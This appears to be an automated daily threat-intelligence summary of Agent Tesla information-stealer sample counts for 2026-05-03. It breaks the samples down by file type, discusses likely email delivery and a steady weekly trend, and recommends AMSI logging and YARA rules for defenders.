Daily Summary
Agent Tesla sample volume reached 60 new samples on 2026-05-03, a 6% decrease from the 7-day average of 64. Activity remains stable with no significant spike or drop, indicating sustained operational tempo from threat actors distributing this information stealer.
New Samples Detected
Script-based delivery dominates today’s sample set. PowerShell (.ps1) files lead with 19 samples, followed by executable (.exe) files with 14, and JavaScript (.js) with 13. Batch files (.bat) and dynamic-link libraries (.dll) each contributed 3 samples, while compressed archives (.rar, .zip, .gz, .tar) total only 5. Packing patterns show a slight shift toward more live code execution via PowerShell and JavaScript compared to the prior 7-day period, which had stronger reliance on executable payloads.
Distribution Methods
The heavy representation of .ps1, .js, and .cmd files suggests email-based campaigns with malicious attachments remain the primary delivery method. PowerShell scripts likely execute in-memory to download the final payload, while JavaScript files may be disguised as invoices or documents. Archives (.rar, .zip) remain a secondary vector for compressing executables or DLLs to evade email gateways.
Detection Rate
Antivirus detection rates are not directly provided, but the presence of script-based samples (PowerShell, JavaScript) indicates potential for social engineering bypass of static signatures. Immediate sandbox analysis of the 60 new IOCs is recommended to assess evasion capabilities.
C2 Infrastructure
No new C2 servers or IPs were recorded today. Existing infrastructure appears stable with no geolocation shifts, suggesting threat actors are reusing known endpoints for staging and data exfiltration.
7-Day Trend
Today’s count of 60 samples aligns closely with the 7-day average of 64, indicating a steady flow of Agent Tesla variants. Activity is neither ramping up nor notably declining, suggesting a consistent campaign rhythm.
Security Analysis
A non-obvious observation is the intentional variety in file types: spreading samples across .ps1, .exe, .js, .bat, .dll, and archives forces defenders to maintain diverse detection rules. Many SOCs prioritize executable detection, leaving script-based initial access under-monitored. Actionable recommendation: enable AMSI (Antimalware Scan Interface) logging for PowerShell, JavaScript, and batch files, and apply YARA rules that flag script-based downloaders for Agent Tesla based on common OLE or base64 patterns. This reduces the dwell time before DLL or EXE payloads execute.